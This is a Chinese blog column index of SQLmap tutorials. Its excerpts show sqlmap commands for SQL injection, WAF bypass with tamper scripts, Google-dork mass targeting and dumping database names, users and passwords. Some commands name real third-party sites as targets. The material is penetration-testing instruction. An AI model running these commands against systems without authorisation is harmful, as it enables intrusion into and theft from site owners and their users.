SQLmap
关注
分享
扫一扫
SQLmap
FLy_鹏程万里
国内网络安全研究员,专注于Web渗透、移动安全、代码审计、应急响应、内网渗透、区块链安全、云安全等研究方向,擅长渗透测试、红蓝对抗、内网渗透、云安全、区块链安全。
展开
-
SQLmap ————1、sqlmap简介以及sqlmap的安装
sqlmap简介Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server,Microsoft Access, IBM DB2, SQLite,...原创 2018-05-04 17:43:02 · 1082 阅读 · 0 评论 -
SQLmap————10、sqlmap详细命令
Sqlmap各种纤细命令:-is-dba 当前用户权限(是否为root权限)-dbs 所有数据库-current-db 网站当前数据库-users 所有数据库用户-current-user 当前数据库用户-random-agent 构造随机user-agent-passwords 数据库密码-proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理-ti...原创 2018-05-05 08:44:46 · 1439 阅读 · 0 评论 -
SQLmap————9、使用参数绕防火墙
检测web服务是否受到防火墙保护首选sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10 --identify-waf备选sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10 --chec...转载 2018-05-05 08:44:14 · 749 阅读 · 0 评论 -
Sqlmap————7、Tamper脚本绕WAF
0x01 start脚本名:apostrophemask.py作用:用utf8代替引号Example: ("1 AND '1'='1") '1 AND%EF%BC%871%EF%BC%87=%EF%BC%871'Tested against: all脚本名:equaltolike.py作用:like 代替等号Example: * Input: SELECT * FROM usersWHE...转载 2018-05-04 18:33:11 · 905 阅读 · 1 评论 -
SQLmap————6、搜索型注入
参数—————— -gsqlmap可以测试注入Google的搜索结果中的Get参数(只获取前100个结果)例如:sqlmap -g "inurl:php?eid="如果可以注入,那么之后和常规一样,通过“--dbs\--tables\--columns\--dump”直接获取数据库名、表名、列名、字段名等等。这里就不再一一罗列了!...原创 2018-05-04 18:11:07 · 2039 阅读 · 0 评论 -
Sqlmap————5、POST注入
具体流程:(1)浏览器打开目标地址http:// www.xxx.com /Login.asp(2)配置burp代理(127.0.0.1:8080)以拦截请求(3)点击login表单的submit按钮(4)这时候Burp会拦截到了我们的登录POST请求(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下(6)运行sqlmap并执行如下命令:1、列数据库...原创 2018-05-04 17:57:32 · 1340 阅读 · 0 评论 -
SQLmap————4、Cookie注入
说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!1、判断是否可以注入Sqlmap –u http://www.xxx.com/cookie/test.asp -...原创 2018-05-04 17:54:56 · 1031 阅读 · 0 评论 -
SQLmap————3、MySQL注入
MySQL注入流程1、判断是否可以注入Sqlmap –u http://www.xxx.com/login.php?id=12、猜解数据库名称Sqlmap –u http://www.xxx.com/login.php?id=1 --Database3、猜解表名Sqlmap –u http://www.xxx.com/login.php?id=1 –D datebasename ...原创 2018-05-04 17:50:52 · 637 阅读 · 0 评论 -
SQLmap————2、Access注入
1、判断给定的URL是否能注入Windows下:sqlmap.py –u http://www.xxx.com/sql/test.asp?id=1Linux下:sqlmap –u http://www.xxx.com/sql/test.asp?id=12、猜解数据库名称Windows下:sqlmap.py –u http://www.xxx.com/sql/test.asp?i...原创 2018-05-04 17:48:24 · 505 阅读 · 0 评论 -
Sqlmap————8、SQLmap延时注入
参数: --delay--safe-freq格式:Sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs --delay 1sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs --safe-freq 3其余的数据...原创 2018-05-05 08:43:57 · 7189 阅读 · 0 评论